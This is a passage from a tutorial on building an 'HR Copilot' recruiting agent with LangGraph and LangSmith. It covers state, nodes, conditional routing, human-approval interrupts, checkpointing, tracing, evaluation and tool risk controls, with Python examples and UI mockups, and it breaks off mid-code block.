<td>A dedicated subgraph for “email approval”</td>
</tr>
</tbody>
</table>
<h5 id="42statebnhlmviccaworkflow">4.2 State: the workflow's working memory</h5>
<p>State is where LangGraph keeps data throughout the run.</p>
<p>For example:</p>
<pre><code class="language-python">from typing import TypedDict, List, Optional

class HRCopilotState(TypedDict):
    user_request: str
    job_id: Optional[str]
    job_description: Optional[dict]
    candidates: List[dict]
    scored_candidates: List[dict]
    top_candidates: List[dict]
    email_draft: Optional[dict]
    hr_approval_status: Optional[str]
    final_result: Optional[str]
</code></pre>
<p>Without state, each step would struggle to know what the previous step did. The agent could easily lose context, or you would have to pass data around by hand, which gets messy.</p>
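<p>In LangGraph, a node usually returns only the keys it changed, and the framework merges that partial update into the shared state. By default, a returned key simply overwrites the previous value; reducers can change that behavior per key. The plain-Python sketch below imitates only the default overwrite. <code>run_linear</code> and both node functions are hypothetical.</p>

```python
from typing import Callable

State = dict
Node = Callable[[State], dict]

def search_candidates(state: State) -> dict:
    # Hypothetical node: returns only the key it produces.
    return {"candidates": [{"id": "C001"}, {"id": "C002"}]}

def score_candidates(state: State) -> dict:
    # Reads what the previous node wrote instead of receiving it as an argument.
    return {"scored_candidates": [{**c, "score": 80 - 20 * i}
                                  for i, c in enumerate(state["candidates"])]}

def run_linear(nodes: list[Node], state: State) -> State:
    for node in nodes:
        update = node(state)
        state = {**state, **update}  # default behavior: returned keys overwrite old values
    return state

final = run_linear([search_candidates, score_candidates], {"user_request": "Senior Go"})
```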
<h5 id="43nodemibclmtfunctionrrng">4.3 Node: each step is a clear function</h5>
<p>A node can be:</p>
<ul>
<li>a plain Python function,</li>
<li>a single LLM call,</li>
<li>a single tool call,</li>
<li>or a smaller agent.</li>
</ul>
<p>For example:</p>
<pre><code class="language-text">load_job_description
search_candidates
score_candidates
rank_candidates
generate_email_draft
wait_hr_approval
send_email
update_pipeline_status
</code></pre>
<p>The upside is that the workflow becomes very easy to read: one look at the graph tells you which steps the agent is allowed to take.</p>
<h5 id="44conditionaledgechworkflowrnhnh">4.4 Conditional edge: where the workflow branches</h5>
<p>In HR Copilot, after scoring we can branch:</p>
<pre><code class="language-text">If any candidate meets the threshold → draft an email
If nobody qualifies → return a report / ask HR again
</code></pre>
<p>After HR reviews the email:</p>
<pre><code class="language-text">approved → send the email
revise   → redraft
rejected → stop
</code></pre>
<p>This is why LangGraph is more powerful than a linear chain.</p>
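<p>A conditional edge ultimately boils down to a function from the state to the name of the next step. Below is a minimal sketch that assumes a hypothetical score threshold of 70 and candidate dicts with a <code>score</code> key. The node names follow the list in section 4.3; <code>"ask_hr"</code> and <code>"end"</code> are illustrative.</p>

```python
SCORE_THRESHOLD = 70  # hypothetical cut-off

def route_after_score(state: dict) -> str:
    """Return the name of the next node based on the scored candidates."""
    passing = [c for c in state["scored_candidates"] if c["score"] >= SCORE_THRESHOLD]
    return "generate_email_draft" if passing else "ask_hr"

def route_after_approval(state: dict) -> str:
    routes = {"approved": "send_email", "revise": "generate_email_draft", "rejected": "end"}
    decision = state["hr_approval_status"]
    # Fail loudly on an unexpected decision instead of guessing a branch.
    if decision not in routes:
        raise ValueError(f"unexpected decision: {decision!r}")
    return routes[decision]
```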
<h5 id="45humanintheloopaixutconngiquytnh">4.5 Human-in-the-loop: AI proposes, humans decide</h5>
<p>In recruiting, the AI should not send emails or reject candidates on its own without human review.</p>
<p>A safer approach:</p>
<pre><code class="language-text">AI finds candidates
→ AI drafts the email
→ HR reviews it
→ only then does the system send it
</code></pre>
<p>In LangGraph, this step can call <code>interrupt()</code> to pause the workflow.</p>
<pre><code class="language-python">from langgraph.types import interrupt

def wait_hr_approval(state: HRCopilotState):
    decision = interrupt({"email_draft": state["email_draft"]})
    return {"hr_approval_status": decision}
</code></pre>
<p>The workflow stops here, waits for HR to click Approve / Revise / Reject, and then resumes from exactly that point. Interrupts only work when the graph is compiled with a checkpointer.</p>
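<p>One way to get a feel for this pause/resume shape without LangGraph is a Python generator: it yields the draft to the caller and receives HR's decision back through <code>send()</code>. This is only an analogy. In LangGraph, the checkpointer persists the state and the caller resumes with <code>Command(resume=...)</code> from <code>langgraph.types</code>. The interrupted node then runs again from its start, and this time <code>interrupt()</code> returns the resume value. <code>approval_workflow</code> and <code>run_with_decision</code> are hypothetical names.</p>

```python
from typing import Generator

def approval_workflow(email_draft: str) -> Generator[dict, str, str]:
    """Pause at the yield, like interrupt(), then continue with HR's decision."""
    decision = yield {"email_draft": email_draft}  # pause: hand the draft to the caller
    if decision == "approved":
        return "email sent"
    if decision == "revise":
        return "back to drafting"
    return "stopped"

def run_with_decision(draft: str, decision: str) -> str:
    flow = approval_workflow(draft)
    next(flow)  # run until the pause; the yielded dict is what HR would review
    try:
        flow.send(decision)  # resume, passing HR's decision back in
    except StopIteration as finished:
        return finished.value  # the generator's return value
    raise RuntimeError("workflow did not finish after one decision")
```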
<h5 id="46checkpointdngrichytip">4.6 Checkpoint: pause and resume</h5>
<p>What if HR does not approve the email right away?</p>
<p>No problem. LangGraph's checkpointers persist the state. With a durable, database-backed checkpointer, the agent can stop today and continue tomorrow, even after a restart.</p>
<p>For example:</p>
<pre><code class="language-text">Day 1: The AI finds candidates, drafts an email, and pauses for HR approval.
Day 2: HR clicks Approve; the workflow resumes, sends the email, and updates the pipeline.
</code></pre>
<p>This is a crucial capability when building agents for real business processes.</p>
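<p>Stripped to its core, a checkpointer saves the state under a thread id and loads it back later. The sketch below uses a dict of JSON strings as a hypothetical stand-in for a database; <code>DictCheckpointer</code> and the thread id are illustrative. LangGraph ships real checkpointers, such as <code>MemorySaver</code> in the next example plus database-backed ones. It identifies a run by the <code>thread_id</code> passed in <code>config["configurable"]</code>.</p>

```python
import json

class DictCheckpointer:
    """Hypothetical checkpointer: keeps the latest state per thread as JSON."""
    def __init__(self) -> None:
        self._store: dict[str, str] = {}

    def save(self, thread_id: str, state: dict) -> None:
        self._store[thread_id] = json.dumps(state)  # serialize, as a DB-backed store would

    def load(self, thread_id: str) -> dict:
        return json.loads(self._store[thread_id])

saver = DictCheckpointer()

# Day 1: the workflow drafts an email and stops to wait for HR.
saver.save("hr-thread-42", {"email_draft": "Interview invite", "hr_approval_status": None})

# Day 2 (possibly a different process in a real system): load the state and continue.
state = saver.load("hr-thread-42")
state["hr_approval_status"] = "approved"
saver.save("hr-thread-42", state)
```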
<h5 id="47vdworkflowlanggraphchohrcopilot">4.7 Example LangGraph workflow for HR Copilot</h5>
<pre><code class="language-text">START
  → parse_hr_request
  → load_job_description
  → search_candidates
  → filter_candidates
  → score_candidates
  → rank_candidates
  → select_top_candidates
  → generate_recommendation_report
  → need_email?
       ├── no  → END
       └── yes → generate_email_draft
                 → wait_hr_approval
                      ├── approved → send_email → update_pipeline_status → END
                      ├── revise   → revise_email → wait_hr_approval
                      └── rejected → END
</code></pre>
<p>Condensed code:</p>
<pre><code class="language-python">from langgraph.graph import StateGraph, START, END
from langgraph.checkpoint.memory import MemorySaver
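from langgraph.types import interrupt

# HRCopilotState is the TypedDict from section 4.2. load_jd_fn, search_candidates_fn,
# score_candidates_fn, rank_candidates_fn, generate_email_draft_fn, send_email_fn and
# update_pipeline_fn are node functions defined elsewhere: each takes the state and
# returns a dict containing only the keys it updates.
builder = StateGraph(HRCopilotState)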

builder.add_node("load_jd", load_jd_fn)
builder.add_node("search", search_candidates_fn)
builder.add_node("score", score_candidates_fn)
builder.add_node("rank", rank_candidates_fn)
builder.add_node("draft_email", generate_email_draft_fn)
builder.add_node("send_email", send_email_fn)
builder.add_node("update_status", update_pipeline_fn)

def wait_hr_approval(state: HRCopilotState):
    decision = interrupt({"email_draft": state["email_draft"]})
    return {"hr_approval_status": decision}

builder.add_node("wait_hr_approval", wait_hr_approval)

builder.add_edge(START, "load_jd")
builder.add_edge("load_jd", "search")
builder.add_edge("search", "score")
builder.add_edge("score", "rank")

def route_after_rank(state: HRCopilotState):
    return "draft_email" if state["top_candidates"] else END

builder.add_conditional_edges("rank", route_after_rank, {
    "draft_email": "draft_email",
    END: END,
})

builder.add_edge("draft_email", "wait_hr_approval")

def route_after_approval(state: HRCopilotState):
    return {
        "approved": "send_email",
        "revise": "draft_email",
        "rejected": END,
    }[state["hr_approval_status"]]

builder.add_conditional_edges("wait_hr_approval", route_after_approval, {
    "send_email": "send_email",
    "draft_email": "draft_email",
    END: END,
})

builder.add_edge("send_email", "update_status")
builder.add_edge("update_status", END)

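# MemorySaver keeps checkpoints in process memory (fine for demos);
# a database-backed checkpointer is needed to resume after a restart.
graph = builder.compile(checkpointer=MemorySaver())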
</code></pre>
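<p>To see how the conditional edges and the revise loop play out, here is a framework-free simulation of the same routing. The node bodies are omitted and HR decisions come from a list instead of real interrupts, so it shows the control flow only. With LangGraph itself, you would call <code>graph.invoke(...)</code> with a <code>thread_id</code> in the config and resume each pause with <code>Command(resume=...)</code>.</p>

```python
END = "__end__"  # sentinel meaning "stop", playing the role of LangGraph's END

# Fixed edges copied from the graph above.
FIXED_EDGES = {
    "load_jd": "search",
    "search": "score",
    "score": "rank",
    "draft_email": "wait_hr_approval",
    "send_email": "update_status",
    "update_status": END,
}

def run_graph(top_candidates: list[str], hr_decisions: list[str]) -> list[str]:
    """Walk the HR Copilot routing and return the visited node names in order."""
    decisions = iter(hr_decisions)
    state = {"top_candidates": top_candidates, "hr_approval_status": None}
    visited: list[str] = []
    node = "load_jd"
    while node != END:
        visited.append(node)
        if node == "rank":  # mirrors route_after_rank
            node = "draft_email" if state["top_candidates"] else END
        elif node == "wait_hr_approval":  # mirrors interrupt() + route_after_approval
            state["hr_approval_status"] = next(decisions)
            node = {
                "approved": "send_email",
                "revise": "draft_email",
                "rejected": END,
            }[state["hr_approval_status"]]
        else:
            node = FIXED_EDGES[node]
    return visited
```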
<h5 id="48khinonndnglanggraph">4.8 When should you use LangGraph?</h5>
<p>Use LangGraph when you see these signs:</p>
<table>
<thead>
<tr>
<th>Sign</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>Multi-step workflow</td>
<td>Search → score → rank → draft → approve → send</td>
</tr>
<tr>
<td>Conditional branches</td>
<td>If information is missing, ask HR again</td>
</tr>
<tr>
<td>Loops</td>
<td>HR asks for the email to be revised several times</td>
</tr>
<tr>
<td>State that must be kept</td>
<td>JD, CVs, scores, email draft</td>
</tr>
<tr>
<td>Human approval</td>
<td>Before sending an email or updating the ATS</td>
</tr>
<tr>
<td>Need to resume</td>
<td>HR approves hours or days later</td>
</tr>
<tr>
<td>Need to control the agent</td>
<td>Not letting the LLM decide everything inside a prompt</td>
</tr>
</tbody>
</table>
<p>If the task is just <code>prompt | model | parser</code>, LangGraph may be overkill. But if the task is a real business process, LangGraph is well worth it.</p>
<hr>
<h4 id="5langsmithnhnthyagentlmg">5. LangSmith: seeing what the agent did</h4>
<p>A major problem with AI apps is that when they answer wrongly, we often do not know where things went wrong.</p>
<p>Say HR asks:</p>
<pre><code class="language-text">Why did the AI pick candidate A over candidate B?
</code></pre>
<p>Without a trace, you only see the final result. You do not know:</p>
<ul>
<li>whether the AI read the right JD,</li>
<li>whether it found the right CVs,</li>
<li>whether the search tool returned incomplete data,</li>
<li>whether the scoring prompt was missing criteria,</li>
<li>whether the model over-inferred,</li>
<li>how much that request cost,</li>
<li>which step was the slowest.</li>
</ul>
<p>LangSmith records that entire journey.</p>
<pre><code class="language-text">User request
→ load_job_description
→ search_candidates
→ read_candidate_cv
→ score_candidate
→ generate_email_draft
→ wait_hr_approval
</code></pre>
<p>LangSmith does not directly make the agent smarter. But it helps the team <strong>see, debug, evaluate, and improve the agent over time</strong>.</p>
<h5 id="51tracecameraquaylitonbrequest">5.1 Trace: a camera recording the whole request</h5>
<p>A trace shows every step the agent went through:</p>
<pre><code class="language-text">Request input
  → load_job_description(job_id="GO-BE-2026")
  → search_candidates(skills=["Go", "MySQL", "AWS"])
  → read_candidate_cv(C001)
  → score_candidate(C001)
  → read_candidate_cv(C002)
  → score_candidate(C002)
  → rank_candidates
  → generate_summary
  → final_answer
</code></pre>
<p>If the result is wrong, you can open the trace and check:</p>
<table>
<thead>
<tr>
<th>Debugging question</th>
<th>What you might find</th>
</tr>
</thead>
<tbody>
<tr>
<td>Did the agent call the right tool?</td>
<td>It called <code>search_old_candidates</code> instead of <code>search_candidates</code></td>
</tr>
<tr>
<td>Did the tool return correct data?</td>
<td>The CV is missing the most recent work experience</td>
</tr>
<tr>
<td>Did RAG retrieve the right documents?</td>
<td>It fetched the Java JD instead of the Go JD</td>
</tr>
<tr>
<td>Is the LLM's scoring reasonable?</td>
<td>It prioritized the wrong criteria</td>
</tr>
<tr>
<td>Which step is slow?</td>
<td>Vector search takes 4 seconds</td>
</tr>
<tr>
<td>Which request uses the most tokens?</td>
<td>The prompt includes too many irrelevant CVs</td>
</tr>
</tbody>
</table>
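<p>To make the “camera” idea concrete, here is a minimal, stdlib-only sketch of what a tracer records for each step: its name, inputs, output or error, and latency. It is not the LangSmith SDK; the <code>traced</code> decorator, the <code>TRACE</code> list, and the toy tool functions are hypothetical stand-ins.</p>
<pre><code class="language-python">import functools
import time
from typing import Any, Callable

# Hypothetical in-process trace store; a real tracer would send records to a backend.
TRACE: list[dict[str, Any]] = []


def traced(fn: Callable) -> Callable:
    """Append one record per call: step name, inputs, output or error, latency."""
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        record: dict[str, Any] = {"step": fn.__name__, "inputs": kwargs or args}
        start = time.perf_counter()
        try:
            record["output"] = fn(*args, **kwargs)
            return record["output"]
        except Exception as exc:
            record["error"] = repr(exc)
            raise
        finally:
            record["latency_s"] = round(time.perf_counter() - start, 4)
            TRACE.append(record)
    return wrapper


@traced
def load_job_description(job_id: str) -> dict:
    # Toy data standing in for a real JD lookup.
    return {"id": job_id, "required_skills": ["Go", "MySQL", "AWS"]}


@traced
def search_candidates(skills: list[str]) -> list[str]:
    # Toy result; a real tool would query the candidate database.
    return ["C001", "C002"]


@traced
def score_candidate(candidate_id: str) -> int:
    return {"C001": 92, "C002": 64}[candidate_id]


jd = load_job_description(job_id="GO-BE-2026")
for cid in search_candidates(skills=jd["required_skills"]):
    score_candidate(candidate_id=cid)

for rec in TRACE:
    print(rec["step"], rec["inputs"], rec.get("output"), f"{rec['latency_s']}s")
</code></pre>
<p>Reading <code>TRACE</code> top to bottom gives the same kind of step list as the trace above, which is what makes questions such as “which step was slow?” answerable.</p>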
<h5 id="52evaluationngnhgiaibngcmgic">5.2 Evaluation: don't judge AI by gut feeling</h5>
<p>When building an AI app, it is easy to say:</p>
<pre><code class="language-text">I tested it and it seems fine.
</code></pre>
<p>But “seems fine” is not good enough for production.</p>
<p>You need a test dataset:</p>
<table>
<thead>
<tr>
<th>Input</th>
<th>Expected behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td>“Evaluate CV A for the Senior Go JD”</td>
<td>Return score, strengths, risks, recommendation</td>
</tr>
<tr>
<td>“Send a rejection email to candidate B”</td>
<td>Do not send immediately; ask HR to confirm first</td>
</tr>
<tr>
<td>“Find Java candidates, but the JD is for Go”</td>
<td>Warn about the mismatch</td>
</tr>
<tr>
<td>“Candidate has no salary expectation”</td>
<td>Flag it as missing information</td>
</tr>
<tr>
<td>“Draft an offer email”</td>
<td>Use the official template and wait for approval</td>
</tr>
</tbody>
</table>
<p>LangSmith lets you run evaluations on that dataset to check whether the agent regresses after each change of prompt, model, or retriever.</p>
<p>Common evaluator types:</p>
<table>
<thead>
<tr>
<th>Evaluator</th>
<th>When to use</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Human</strong></td>
<td>HR or a domain expert grades by hand</td>
</tr>
<tr>
<td><strong>Code</strong></td>
<td>There is a clear rule, e.g. the output must have a <code>match_score</code> field</td>
</tr>
<tr>
<td><strong>LLM-as-judge</strong></td>
<td>A separate LLM grades how reasonable the answer is</td>
</tr>
<tr>
<td><strong>Pairwise</strong></td>
<td>Compare the outputs of prompt A and prompt B</td>
</tr>
</tbody>
</table>
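<p>The evaluation loop itself is easy to picture. The sketch below runs a tiny dataset modeled on the table above through an agent and applies two code evaluators: one checks the <code>match_score</code> field, the other checks that an email request stops at approval. It is plain Python, not the LangSmith evaluation API; <code>fake_agent</code>, the dataset, and the evaluator names are hypothetical.</p>
<pre><code class="language-python">from typing import Callable

# Hypothetical dataset: an input plus the behavior we expect from the agent.
DATASET = [
    {"input": "Evaluate CV A for the Senior Go JD", "expect": "score"},
    {"input": "Send a rejection email to candidate B", "expect": "needs_approval"},
]


def fake_agent(text: str) -> dict:
    """Stand-in for the real agent; returns structured output."""
    if "email" in text.lower():
        return {"action": "request_hr_approval", "email_sent": False}
    return {"match_score": 82, "recommendation": "move_to_interview"}


def has_match_score(case: dict, output: dict) -> bool:
    # Code evaluator: scoring requests must return a numeric match_score.
    if case["expect"] != "score":
        return True
    return isinstance(output.get("match_score"), (int, float))


def never_sends_without_approval(case: dict, output: dict) -> bool:
    # Code evaluator: email requests must stop at approval instead of sending.
    if case["expect"] != "needs_approval":
        return True
    return output.get("email_sent") is False and output.get("action") == "request_hr_approval"


def run_eval(agent: Callable[[str], dict], evaluators: list) -> dict[str, float]:
    hits = {ev.__name__: 0 for ev in evaluators}
    for case in DATASET:
        output = agent(case["input"])
        for ev in evaluators:
            hits[ev.__name__] += int(ev(case, output))
    # Pass rate per evaluator.
    return {name: n / len(DATASET) for name, n in hits.items()}


results = run_eval(fake_agent, [has_match_score, never_sends_without_approval])
print(results)
</code></pre>
<p>Running the same function before and after a prompt or model change turns “seems fine” into numbers; a drop in any pass rate is the regression signal.</p>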
<h5 id="53monitoringkhiagentchytht">5.3 Monitoring: when the agent runs for real</h5>
<p>Once HR Copilot is in production, you need to track:</p>
<ul>
<li>latency,</li>
<li>token usage,</li>
<li>cost,</li>
<li>error rate,</li>
<li>tool failure,</li>
<li>retrieval quality,</li>
<li>HR feedback,</li>
<li>prompt version,</li>
<li>model version,</li>
<li>the agent's path through the graph.</li>
</ul>
<p>Without monitoring, all the team hears is “the AI answered wrong”. With monitoring, the team knows where it went wrong and can fix the right spot.</p>
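<p>Most of those signals can be computed from per-run records. A minimal sketch, assuming each run is logged as a dict with latency, token count, an error flag, and a prompt version, and assuming a made-up flat token price (real pricing depends on the model and provider):</p>
<pre><code class="language-python">from statistics import median

# Hypothetical per-run records; in practice they come from your tracing backend.
RUNS = [
    {"latency_s": 2.1, "tokens": 3200, "error": False, "prompt_version": "v3"},
    {"latency_s": 6.8, "tokens": 9100, "error": True, "prompt_version": "v3"},
    {"latency_s": 1.9, "tokens": 2800, "error": False, "prompt_version": "v4"},
    {"latency_s": 2.4, "tokens": 3000, "error": False, "prompt_version": "v4"},
]

PRICE_PER_1K_TOKENS = 0.002  # assumed flat price, for illustration only


def summarize(runs: list[dict]) -> dict:
    total_tokens = sum(r["tokens"] for r in runs)
    return {
        "runs": len(runs),
        "median_latency_s": median(r["latency_s"] for r in runs),
        "max_latency_s": max(r["latency_s"] for r in runs),
        "total_tokens": total_tokens,
        "est_cost": round(total_tokens / 1000 * PRICE_PER_1K_TOKENS, 4),
        "error_rate": sum(r["error"] for r in runs) / len(runs),
    }


def by_version(runs: list[dict]) -> dict[str, dict]:
    # Group by prompt version so a regression can be tied to a specific change.
    versions = sorted({r["prompt_version"] for r in runs})
    return {v: summarize([r for r in runs if r["prompt_version"] == v]) for v in versions}


print(summarize(RUNS))
print(by_version(RUNS))
</code></pre>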
<h5 id="54langsmithkhngchdngcholangchain">5.4 LangSmith is not only for LangChain</h5>
<p>One notable point: LangSmith does not require your app to be written with LangChain.</p>
<p>You can use LangSmith to observe apps built with many other frameworks or SDKs, because it supports tracing/observability standards such as OpenTelemetry.</p>
<p>Put simply, LangSmith is an observability layer for AI apps, not just a “LangChain log viewer”.</p>
<hr>
<h3 id="phniicasestudybuildhrcopilot">PART II. CASE STUDY: BUILDING HR COPILOT</h3>
<hr>
<h4 id="6hrcopilotcnlmg">6. What does HR Copilot need to do?</h4>
<p>Imagine a company wants to build an internal tool called <strong>HR Copilot</strong>.</p>
<p>HR types:</p>
<pre><code class="language-text">Find suitable candidates for the Senior Backend Go Developer position,
preferably with AWS, MySQL, and Japanese N2. If someone fits, draft an interview invitation email.
</code></pre>
<p>The tool needs to run as follows:</p>
<pre><code class="language-text">Understand the request
→ Fetch the JD
→ Search for candidates
→ Read CVs and past notes
→ Score
→ Rank
→ Explain the reasoning behind the choice
→ Draft the email
→ Wait for HR approval
→ Send the email
→ Update the pipeline
→ Record the trace
</code></pre>
<p>This is a good example of why all three tools are needed:</p>
<table>
<thead>
<tr>
<th>Layer</th>
<th>Role in HR Copilot</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LangChain</strong></td>
<td>prompt, model, structured output, tool calling, RAG</td>
</tr>
<tr>
<td><strong>LangGraph</strong></td>
<td>multi-step workflow, state, branching, approval, resume</td>
</tr>
<tr>
<td><strong>LangSmith</strong></td>
<td>trace, debug, evaluation, monitoring</td>
</tr>
</tbody>
</table>
<hr>
<h4 id="7kintrctngth">7. Overall architecture</h4>
<pre><code class="language-text">HR User
  → Web App / Slack Bot / Internal Tool
  → Backend API
  → AI Layer
       ├── LangChain
       │     ├── Model
       │     ├── Prompt
       │     ├── Tool calling
       │     ├── Retriever / RAG
       │     └── Structured output
       │
       ├── LangGraph
       │     ├── State
       │     ├── Nodes
       │     ├── Edges
       │     ├── Conditional routing
       │     ├── Human approval
       │     └── Checkpoint
       │
       └── LangSmith
             ├── Trace
             ├── Evaluation
             ├── Monitoring
             └── Cost / latency tracking

  → Business Systems
       ├── Candidate DB
       ├── CV storage
       ├── JD database
       ├── Gmail / SMTP
       ├── Google Calendar
       ├── Slack
       └── ATS / Google Sheet
</code></pre>
<hr>
<h4 id="8datamodelngin">8. A simple data model</h4>
<p>For the demo, we can start with three groups of data:</p>
<pre><code class="language-text">Candidate
  - id
  - name
  - email
  - skills
  - language_level
  - years_of_experience
  - current_status
  - cv_url
  - notes

JobDescription
  - id
  - title
  - required_skills
  - nice_to_have_skills
  - language_requirement
  - level
  - salary_range

PipelineStatus
  - candidate_id
  - job_id
  - status
  - last_contacted_at
  - interviewer
  - next_action
</code></pre>
<p>Don't over-design from the start. A prototype only needs enough data to prove the workflow works.</p>
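<p>For a Python prototype, the three groups above map naturally onto dataclasses. The field names follow the outline; the types, the defaults, and the example <code>status</code> values are assumptions.</p>
<pre><code class="language-python">from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional


@dataclass
class Candidate:
    id: str
    name: str
    email: str
    skills: list[str]
    language_level: Optional[str]  # e.g. "N2"; None if unknown
    years_of_experience: float
    current_status: str
    cv_url: str
    notes: list[str] = field(default_factory=list)


@dataclass
class JobDescription:
    id: str
    title: str
    required_skills: list[str]
    nice_to_have_skills: list[str]
    language_requirement: Optional[str]
    level: str
    salary_range: Optional[tuple[int, int]] = None


@dataclass
class PipelineStatus:
    candidate_id: str
    job_id: str
    status: str  # assumed values such as "screening", "interview", "rejected"
    last_contacted_at: Optional[datetime] = None
    interviewer: Optional[str] = None
    next_action: Optional[str] = None


jd = JobDescription(
    id="GO-BE-2026",
    title="Senior Backend Go Developer",
    required_skills=["Go", "MySQL", "AWS"],
    nice_to_have_skills=["Kubernetes"],
    language_requirement="N2",
    level="Senior",
)
a = Candidate(
    id="C001", name="Nguyen Van A", email="a@example.com",
    skills=["Go", "MySQL", "AWS"], language_level="N2",
    years_of_experience=5, current_status="active",
    cv_url="https://example.com/cv/C001",
)
# Required skills the candidate is missing (an empty set here).
print(set(jd.required_skills) - set(a.skills))
</code></pre>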
<hr>
<h4 id="9toollistchohrcopilot">9. Tool list for HR Copilot</h4>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Input</th>
<th>Output</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>get_job_description</code></td>
<td>job_id / keyword</td>
<td>JD detail</td>
<td>Fetch the position details</td>
</tr>
<tr>
<td><code>search_candidates</code></td>
<td>skills, level, language</td>
<td>Candidate list</td>
<td>Find candidates</td>
</tr>
<tr>
<td><code>get_candidate_cv</code></td>
<td>candidate_id</td>
<td>CV text</td>
<td>Read the CV</td>
</tr>
<tr>
<td><code>get_candidate_notes</code></td>
<td>candidate_id</td>
<td>Notes/history</td>
<td>See the contact history</td>
</tr>
<tr>
<td><code>score_candidate</code></td>
<td>CV + JD</td>
<td>Score JSON</td>
<td>Score the candidate</td>
</tr>
<tr>
<td><code>generate_email_draft</code></td>
<td>candidate + JD</td>
<td>Email draft</td>
<td>Draft the email</td>
</tr>
<tr>
<td><code>request_hr_approval</code></td>
<td>draft + candidate</td>
<td>approval result</td>
<td>Wait for HR approval</td>
</tr>
<tr>
<td><code>send_email</code></td>
<td>to, subject, body</td>
<td>send result</td>
<td>Send the email</td>
</tr>
<tr>
<td><code>update_pipeline_status</code></td>
<td>candidate_id, status</td>
<td>update result</td>
<td>Update the ATS</td>
</tr>
<tr>
<td><code>post_slack_summary</code></td>
<td>channel, message</td>
<td>post result</td>
<td>Report to the team</td>
</tr>
</tbody>
</table>
<p>A key principle: the agent must not be free to call every tool.</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Risk</th>
<th>How to control it</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>search_candidates</code></td>
<td>Low</td>
<td>Allow</td>
</tr>
<tr>
<td><code>get_candidate_cv</code></td>
<td>Medium</td>
<td>Log access</td>
</tr>
<tr>
<td><code>send_email</code></td>
<td>High</td>
<td>Requires HR approval</td>
</tr>
<tr>
<td><code>update_pipeline_status</code></td>
<td>High</td>
<td>Requires approval or a role-based permission</td>
</tr>
<tr>
<td><code>send_offer_letter</code></td>
<td>Very high</td>
<td>Human approval is mandatory</td>
</tr>
</tbody>
</table>
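<p>One way to enforce that table in code is a gate between the agent and the tools: low-risk calls pass, medium-risk calls are logged, and high-risk calls are refused unless a human approval is attached. A minimal sketch; <code>RISK</code>, <code>call_tool</code>, and <code>ApprovalRequired</code> are hypothetical names. In a LangGraph workflow the refusal would more naturally route the run to an approval step than raise an exception.</p>
<pre><code class="language-python">import logging
from typing import Any, Callable, Optional

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("tool_gate")

# Risk levels taken from the table above.
RISK = {
    "search_candidates": "low",
    "get_candidate_cv": "medium",
    "send_email": "high",
    "update_pipeline_status": "high",
    "send_offer_letter": "very_high",
}


class ApprovalRequired(Exception):
    """Raised when a high-risk tool is called without a human approval."""


def call_tool(name: str, fn: Callable[..., Any], *, user: str,
              approved_by: Optional[str] = None, **kwargs) -> Any:
    level = RISK.get(name, "high")  # unknown tools are treated as high risk
    if level == "medium":
        log.info("access: user=%s tool=%s args=%s", user, name, kwargs)
    elif level in ("high", "very_high") and not approved_by:
        raise ApprovalRequired(f"{name} needs human approval")
    return fn(**kwargs)


def send_email(to: str, subject: str, body: str) -> str:
    return f"sent to {to}"  # fake sender for the demo


print(call_tool("search_candidates", lambda skills: ["C001"], user="hr01", skills=["Go"]))
try:
    call_tool("send_email", send_email, user="hr01",
              to="a@example.com", subject="Interview", body="...")
except ApprovalRequired as exc:
    print("blocked:", exc)
print(call_tool("send_email", send_email, user="hr01", approved_by="hr_lead",
                to="a@example.com", subject="Interview", body="..."))
</code></pre>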
<hr>
<h4 id="10mockuplungsdng">10. Usage flow mockup</h4>
<h5 id="mn1hrnhpyucu">Screen 1: HR enters a request</h5>
<pre><code class="language-text">┌─ HR Copilot ───────────────────────────────────────────────┐
│                                                            │
│  HR ▸ Find candidates for Senior Backend Go Developer,     │
│       prefer AWS / MySQL / Japanese N2. If one fits,       │
│       draft an interview invitation email.         [Send]  │
│                                                            │
│  ⏳ Agent is running…                                      │
│     ✓ Fetched JD: Senior Backend Go Developer              │
│     ✓ Found 3 candidates                                   │
│     ✓ Scoring finished                                     │
│     ✓ 1 candidate passed the threshold                     │
│     ⏸ Email drafted, awaiting your approval                │
│                                                            │
└────────────────────────────────────────────────────────────┘
</code></pre>
<h5 id="mn2bngngvinchmim">Screen 2: Scored candidate table</h5>
<pre><code class="language-text">┌─ Results: Senior Backend Go Developer ─────────────────────┐
│                                                            │
│  #  Candidate       Score Action         Strengths         │
│  ─  ─────────────   ───── ───────────    ───────────────   │
│  1  Nguyen Van A    92★   Interview      Go, MySQL, AWS    │
│  2  Tran Thi B      64    On hold        Go, MySQL         │
│  3  Le Van C        58    On hold        AWS               │
│                                                            │
│  ▸ Why pick #1?                                            │
│    Meets 3/3 required skills + N2 + 5 years' experience.   │
│    Risk: team management experience is unclear.            │
│                                                            │
│            [ View full CV ]   [ Draft email for #1 ]       │
└────────────────────────────────────────────────────────────┘
</code></pre>
<h5 id="mn3hrduytemailtrckhigi">Screen 3: HR reviews the email before sending</h5>
<pre><code class="language-text">┌─ Review email before sending ──────────────────────────────┐
│  To: a@example.com                                         │
│  Subject: Invitation to interview - Senior Backend Go Dev  │
│  ────────────────────────────────────────────────────────  │
│  Hi Nguyen Van A,                                          │
│  Thanks for your interest in Senior Backend Go Developer   │
│  … content drafted by the agent …                          │
│  Best regards, HR Team                                     │
│  ────────────────────────────────────────────────────────  │
│     [ ✓ Approve & Send ]   [ ✎ Revise ]   [ ✗ Cancel ]     │
└────────────────────────────────────────────────────────────┘
</code></pre>
<p>These three buttons map directly to three branches in LangGraph:</p>
<pre><code class="language-text">approved → send_email → update_pipeline_status
revise   → revise_email → wait_hr_approval
rejected → END
</code></pre>
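<p>In LangGraph this kind of mapping is usually written as a function that reads the state and returns the name of the next node, registered on the graph with <code>add_conditional_edges</code>. The sketch below keeps only that routing logic plus a tiny replay loop in plain Python, so it runs without dependencies; the <code>hr_decision</code> state key and the <code>walk</code> helper are assumptions, and the node names come from the branches above.</p>
<pre><code class="language-python">from typing import Literal, TypedDict

END = "__end__"  # stand-in for LangGraph's END constant


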